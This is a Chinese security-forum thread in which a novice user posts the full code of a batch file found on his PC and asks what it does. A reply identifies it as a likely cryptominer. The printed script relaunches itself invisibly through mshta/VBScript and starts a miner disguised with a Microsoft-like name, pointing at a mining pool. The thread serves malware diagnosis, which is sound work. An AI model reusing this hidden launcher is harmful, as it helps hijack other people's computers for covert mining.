好友
阅读权限20
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 gzh820101 于 2022-3-6 10:24 编辑
电脑光标总不停的闪烁,原来是这个批处理再作怪,大家帮忙分享下啥意思
windows批出来,在电脑c盘C:\ProgramData/MicrosoftBIM.bat
代码如下:
@echo off
if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
MicrosoftBIM -a ethash -o cn.sparkpool.com:3333 -u sp_fuzor.ddds -log
本人小白,完全看不懂这个代码是干啥的,我电脑是不是被黑客控制了,我把这个批处理删除后,光标就不闪烁了
-------------------------------------------------------
现在基本确认是挖矿的,我就比较好奇,现在病毒都是bat的吗,那么他是怎么到我电脑的,是不是我电脑还有别的病毒埋伏,他能操作我电脑,自己在我电脑新建了这个代码,昨天发现这个的时候,当天没有打开过网页,还是查询他的时候开的网页,追溯到前天4号,从河东下载站下载过一个软件,浏览记录如下:
不知道是不是因为下载他的原因 |
免费评分
-
查看全部评分
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
[复制链接]
发表于 2022-3-6 08:52
搜索其中关键字,挖矿嫌疑很大